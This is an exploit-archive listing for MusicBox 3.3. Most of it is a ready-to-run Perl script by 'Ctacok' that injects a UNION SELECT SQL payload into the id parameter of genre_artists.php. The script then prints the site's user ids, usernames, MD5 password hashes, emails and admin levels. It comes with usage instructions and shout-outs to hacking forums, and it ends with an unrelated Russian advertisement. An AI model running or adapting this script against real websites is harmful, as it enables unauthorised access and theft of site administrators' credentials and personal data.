MusicBox 3.3 SQL Injection

🗓️ 20 Apr 2010 00:00:00Reported by CtacokType

packetstorm🔗 packetstormsecurity.com👁 19 Views

MusicBox 3.3 SQL Injection, Exploit Title, Author, Version, Tested on, Code, Admin information extractio

`  
  
# Exploit Title: MusicBox v 3.3 SQL INJECTION EXPLOIT  
# Date: 20.04.2010  
# Author: Ctacok  
# Version: 3.3  
# Tested on: Windows XP SP 2  
# Code:  
  
#!/usr/bin/perl   
use LWP::Simple;  
print "\n";  
print "##############################################################\n";  
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT #\n";  
print "# Author: Ctacok (Russian) #\n";  
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";  
print "##############################################################\n";  
print "\n Usage: exploit.pl [host] [path] ";  
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";  
print "\n userlevel 9 = SuperAdmin ";  
print "\n pass = md5($pass)";  
if (@ARGV < 2)  
{  
exit;  
}  
$host=$ARGV[0];  
$path=$ARGV[1];  
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+";  
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");  
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){  
print "\n[+] Admin id: : $1";  
print "\n[+] Admin username: $2";  
print "\n[+] Admin password: $3";  
print "\n[+] Admin email: $4";  
print "\n[+] Admin userlevel: $5";  
}else{  
print "\n My name is Fail, Epic Fail... \n"  
}  
_______________________________________________________________  
Проводится конкурс: Лучшей темы личного кабинета на NextMail  
Подробности здесь http://design2010.nextmail.ru  
  
  
  
  
  
`

20 Apr 2010 00:00Current

0.1Low risk

Vulners AI Score0.1